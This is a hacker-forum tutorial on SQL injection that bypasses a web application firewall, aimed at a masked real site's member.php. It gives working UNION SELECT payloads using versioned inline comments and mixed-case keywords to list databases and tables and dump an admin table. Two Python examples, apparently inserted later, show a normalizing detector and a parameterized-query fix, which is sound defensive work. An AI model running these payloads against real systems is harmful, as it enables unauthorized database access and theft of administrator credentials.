SQL Injection; Basic WAF bypass

SALAM Brothers :) 
I'm bringing this tutorial to show you how to Bypass WAF(Windows Application Firewall)

You have found your SQLi-vulnerable site and worked out how many columns it has (in this case 60).

You run the usual query:

Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60--

The website returns this error message:

[Image: screenshot_5.png]


What you do now is wrap the blocked keywords in MySQL inline (versioned) comments: the WAF treats /*!...*/ as a comment, but MySQL still executes what is inside it. Like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60--

And now the website returns this:

[Image: screenshot_6.png]

OK, now we try to return version(), database() and user() in one column, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,concat('TheHacker+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60--

The website returns this:


[Image: screenshot_7.png]

Now write "concat" in mixed upper and lower case, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,CoNcAt('TheHacker+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60--

Now for the good part: let's list all the databases. Here is the regular syntax:

Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60 from information_schema.schemata--

But with our new techniques the syntax looks like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,GrOuP_CoNcAt(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60 from information_schema.schemata--

The website returns:

[Image: screenshot_8.png]

Now we get the tables:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60 from information_schema.tables where table_schema=database()--

The website returns:

[Image: screenshot_9.png]

Now you have to wrap information_schema (or tables) in an inline comment as well, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60 from /*!information_schema*/.tables where table_schema=database()--

And this returns:

[Image: screenshot_10.png]

It's the same to get the columns; you know the drill.
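From the defensive side, the three tricks above (inline versioned comments, mixed-case keywords, and a commented-out identifier) all defeat a rule that matches the raw request text. The following Python example is added here and is not part of the original post: it normalizes a query fragment to roughly what MySQL would execute (versioned comments unwrapped, plain comments dropped, whitespace collapsed, case folded) before keyword matching, and shows that a naive case-sensitive `UNION SELECT` signature misses the evaded forms while the normalized check catches them. The sample fragments are constructed in the shape of the post's queries (three columns instead of sixty); the function and constant names are my own.

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the body of a versioned comment (/*!UNION*/ or /*!50000UNION*/),
# so a detector must keep that body; an ordinary /* ... */ comment is dropped.
VERSIONED_COMMENT = re.compile(r"/\*!\d{0,6}\s*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*(?!!).*?\*/", re.S)

# The naive rule: case-sensitive, whitespace only between the two words, no
# comments tolerated. This is the kind of pattern the post's tricks are aimed at.
NAIVE_RULE = re.compile(r"\bUNION\s+SELECT\b")

# Keywords checked after normalization (all lower case).
KEYWORDS = (
    "union select",
    "information_schema",
    "group_concat(",
    "concat(",
    "version()",
    "user()",
    "database()",
)


def normalize(fragment: str) -> str:
    """Reduce a query fragment to roughly what MySQL would execute."""
    s = unquote_plus(fragment)               # URL-decode, as the web server would
    s = VERSIONED_COMMENT.sub(r" \1 ", s)    # /*!SELECT*/ -> SELECT (still executed)
    s = PLAIN_COMMENT.sub(" ", s)            # /* junk */ -> nothing
    s = re.sub(r"\s+", " ", s)               # collapse whitespace runs
    return s.lower().strip()


def naive_flags(fragment: str) -> bool:
    """Verdict of a case-sensitive signature applied to the raw text."""
    return NAIVE_RULE.search(fragment) is not None


def normalized_hits(fragment: str) -> list[str]:
    """Keywords present once the fragment has been normalized."""
    n = normalize(fragment)
    return [k for k in KEYWORDS if k in n]


# Constructed samples in the shape of the post's queries (constructed, not captured traffic).
SAMPLES = {
    "plain":    "-182 UNION SELECT 1,2,3--",
    "comments": "-182 /*!UNION*/ /*!SELECT*/ 1,2,3--",
    "case":     "-182 /*!UNION*/ /*!SELECT*/ 1,CoNcAt('x',0x3a,version(),0x3a,user()),3--",
    "schema":   "-182 /*!UNION*/ /*!SELECT*/ 1,GrOuP_CoNcAt(table_name),3 "
                "from /*!information_schema*/.tables where table_schema=database()--",
    "benign":   "182",
}


def report() -> dict[str, tuple[bool, list[str]]]:
    """Naive verdict and normalized hits for every sample."""
    return {name: (naive_flags(p), normalized_hits(p)) for name, p in SAMPLES.items()}


if __name__ == "__main__":
    for name, (naive, hits) in report().items():
        print(f"{name:9} naive={naive!s:5} normalized={hits}")
```

The point of the normalization step is that the rule runs on the query MySQL will see, not on the bytes the client sent; a rule that only looks at raw text has to enumerate every comment and case variant, which is what the post's closing remark about "endless" techniques is really about.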

If you now want to dump the id column from the admin table, you do it like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(id),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60 from admin--

ATTENTION: This is only a basic WAF bypass; the techniques are endless.
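Because the techniques are endless, a WAF signature is only a stop-gap. The root defect in a page like member.php is that the id parameter is spliced into the SQL text. The following Python example, added here and not from the post, puts that vulnerable lookup beside the fixed one: the fixed version validates the id as an integer and binds it as a query parameter, so the UNION payload from the post (reduced to three columns) returns nothing. SQLite stands in for MySQL so the example runs offline; the table names, rows and payload are constructed.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the site's database (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE members (id INTEGER PRIMARY KEY, name TEXT, email TEXT);
        CREATE TABLE admin   (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO members VALUES (182, 'alice', 'alice@example.test');
        INSERT INTO admin   VALUES (1, 'admin', '<password-hash-placeholder>');
        """
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_id: str) -> list:
    """The pattern the post exploits: the request value is pasted into the SQL text."""
    sql = f"SELECT id, name, email FROM members WHERE id = {user_id}"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, user_id: str) -> list:
    """Validate the type, then bind the value as a parameter.

    The driver sends the parameter separately from the statement text, so the
    value can never change the query's structure; the integer check on top of
    that rejects anything that is not a member id at all.
    """
    try:
        member_id = int(user_id)
    except ValueError:
        return []  # reject; a real application would also log the attempt
    return conn.execute(
        "SELECT id, name, email FROM members WHERE id = ?", (member_id,)
    ).fetchall()


# Constructed payload in the shape of the post's final query (three columns, not sixty).
PAYLOAD = "-182 UNION SELECT id, username, password FROM admin--"


if __name__ == "__main__":
    conn = build_db()
    print("vulnerable:", vulnerable_lookup(conn, PAYLOAD))  # the admin row comes back
    print("safe      :", safe_lookup(conn, PAYLOAD))        # []
    print("safe, real:", safe_lookup(conn, "182"))          # alice's row
```

With the parameterized version, the inline-comment and case tricks from the post have nothing to act on: the id is never part of the statement text, so there is no keyword for a WAF to block or for an attacker to disguise.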


Hope I helped you Shy